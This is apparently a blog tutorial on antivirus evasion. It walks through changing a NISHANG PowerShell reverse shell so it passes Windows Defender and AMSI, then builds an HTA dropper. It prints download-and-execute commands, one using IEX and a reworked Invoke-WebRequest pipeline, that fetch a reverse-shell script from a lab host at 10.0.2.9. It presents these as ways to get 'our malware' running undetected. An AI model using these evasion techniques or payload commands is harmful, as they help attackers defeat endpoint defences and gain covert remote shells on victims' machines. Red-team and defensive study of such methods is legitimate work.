OK, let’s talk about AV Evasion, the first thing I should mention is “How do AV’s work?”. Let’s understand how AV’s flag,our malware in a very simple way there are 3 methods,but I will only be talking about 2. And these are very simple to understand.
Easy right? A signature is created for a known malware and it’s added to a DB that the AV holds and when it touches Disk it will compare it with it’s known Signatures and if found it will flag it and Block its execution. Every file created has a unique hash that can be easily found by using various tools or just a simple PowerShell Command. Get-FileHash
Awesome, simple let’s say this is the Hash used for the AV Database and THIS is what get’s flagged. So how should we approach this situation? I guess you can tell by now that we should change this Hash to a New one and if it doesn’t exist in the DB it will run with no issues.
Easy, we managed to change the signature of the file just by adding some simple words and not affecting its original content. But let’s be honest this is not enough, nowadays we need to take a deeper approach and learn a little on how our malware works to modify its code and behavior a slight bit but still get the same end Results.
Let’s work with some live malware in this sample I will use the NISHANG PowerShell Reverse Shell Script I will run it Default so you can see how this gets flagged and then modify it so it will bypass and execute our code.
What happens when this Malware touches Disk on a clean Windows 10 20H2 Install with all the updates applied, remember I am trying to evade the Newest of the Newest.
Wow, almost immediately it gets flagged and Deleted.
Well Of course let’s see the Signature on VT.
Ouch 16 / 57, and unfortunately those 16 that detect are the most popular AVs in the Market. We are trying to Avoid this and Bypass AV.
Let’s work with the Payload and start changing it ever so slightly without messing up the Code and have it bypass the AV.
Here is a Snippet of the Code.
So, what is getting flagged here??, Guessed it already? Here is a Hint. It’s the variables, ALL the code you see here is legit PowerShell Code, there is nothing malicious about it, all are functional legit pieces of Code from PowerShell.
I mean come on, NISHANG?? Pretty easy string to detect and have it flagged.
Let’s change them, let’s delete the Comments, Rename Variables and Remove anything that keeps the Original Name of the Malware (NISHANG) in this case.
Perfect, I didn’t mess with the Code, I change a few commands and removed the word NISHANG that gets flagged almost immediately.
Let’s Run it.
And our Shell
Excellent, No Amsi, No AV, No Errors, Simple and Clean.
So how does this work, it’s in the name right? Even if the Signature is New and never seen before on the AV’s Database its still smart enough to understand how our Malware works, I mean obvious, everyone goes for well known steps.
Let’s use a common payload: HTA
What is HTA?
Microsoft HTML Applications files that can hold Jscript and VBScript Code and have it executed on the System, they like Binaries as well but can execute Internet Applications outside of the Browser.
I created a small Python Script that builds an HTA file that will Download and Execute a very common Payload.
But this happens once it touches Disk.
Ouch, why is that? well simple it’s a very common procedure the Payload contains No Malicious Code, but it’s behavior, what’s it doing you ask?
oShell.Run(“powershell.exe -WindowStyle hidden -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString(‘http[:]//10.0.2.9:8000/Invoke-PowerShellTcp[.]ps1’)
Its this Piece of Code, the thing is known for being Malicious on Executing Malware from the Internet, what can I do, I want to run from memory but this is blocking me, is their any other options around it that can help me on executing??.
Its that Darn IEX, Invoke-Expression that burns us out here, WE can change the Alias to something else and the functionality would still be the same, BUT that’s another story.
Of Course, what is the behavior here? The code immediately tries to run a PowerShell Script embedded on an HTA File. But what happens when I just want the thing to Download to the Machine? An example would be Invoke-WebRequest here.
Yay! Nothing our malware doesn’t get deleted, but unfortunately, it’s not Executed!!! Damn.
Well Don’t worry friend because here comes your favorite Hero. The Pipeline operator (|). Very simple what does this do, well it continues running code, after one line has been finished and it tells it were to continue off, sort of like a checkpoint. Now we can download the File AND Execute it as well.
Invoke-WebRequest -Uri http[:]//10.0.2.9[:]8000/Invoke-PowerShellTcp[.]ps1 -OutFile Shell.ps1 | powershell.exe IEX C\Users\User\Downloads\Shell.ps1
As you can see, I changed the behavior slightly, instead of running directly from the HTA file the HTA Downloads and then Executes the File. To avoid that suspicious behavior of Completely Executing immediately on Run. And got a successful Reverse Shell.
As you can see these are just a few of the many methods we can take, and the so MANY files that can be used to execute our malicious code. I mean A LOT is out there. And these are the most Basic in the matter.
After seeing a few of these examples,can the code get better?, Yes. Can I avoid using the pipe??. Yeah. What about Obfuscation?, Of Course. These are just meant to demonstrate a little on AV Evasion there are even more articles out that explain more into detail the process and the complete functionality of the utilities and code that is being used in the PS1 Script or even the process the AV uses to detect these files. Just practice and do you research to work around these things in new ways. LOLBAS???.
One thought on “Av Evasion (Revisited)”